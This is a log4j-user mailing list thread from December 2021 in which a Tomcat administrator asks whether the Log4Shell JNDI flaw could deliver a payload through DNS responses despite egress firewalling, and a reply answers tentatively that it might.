JNDI supports DNS as one of its protocols, but I've never confirmed that you can load anything malicious through it. I've assumed it's possible, though. I don't know if whitelisting DNS servers is sufficient due to recursive DNS resolution in the protocol itself.
On Tue, Dec 14, 2021 at 2:35 PM <r.barc...@habmalnefrage.de> wrote: > > Dear log4j experts, > > It's sad that this nice project gets so much negative attention because of > the current security issue. > > I have a question to analyse the impact for me: > > I've been using Log4j2 in a web application run in Tomcat 9.0 (always latest > version). > On my Linux machine, this Tomcat instance runs as a dedicated user (e.g. > "tomcatappuser"). > Through iptables this user has never been allowed to make any outgoing > connections to the Internet except for a few whitelisted IP addresses of used > REST interfaces. So the web application was never able to connect to > arbitrary external IP addresses through any port (HTTP, LDAP, ...). No > outgoing TCP, UDP or ICMP connections possible except to whitelisted > trustworthy IP addresses. > > BUT it was allowed to resolve host names through 2 whitelisted DNS server IP > addresses (let's say e.g. 8.8.8.8). > Now I've even blocked that and put the host name / IP address mappings of the > used REST endpoints into /etc/hosts. > > I have no indication that the Log4j vulnerability actually has been exploited > on my system to do any harm. > But could a malicious payload have arrived on my system inside the DNS > response of my legitimate DNS server? > I'm thinking of a TXT record that might contain a serialized Java object...? > Was this also possible through this lookup expression resolution flaw? > > Thanks in advance for your thoughts! > Reg > > --------------------------------------------------------------------- > To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org > For additional commands, e-mail: log4j-user-h...@logging.apache.org > --------------------------------------------------------------------- To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org For additional commands, e-mail: log4j-user-h...@logging.apache.org
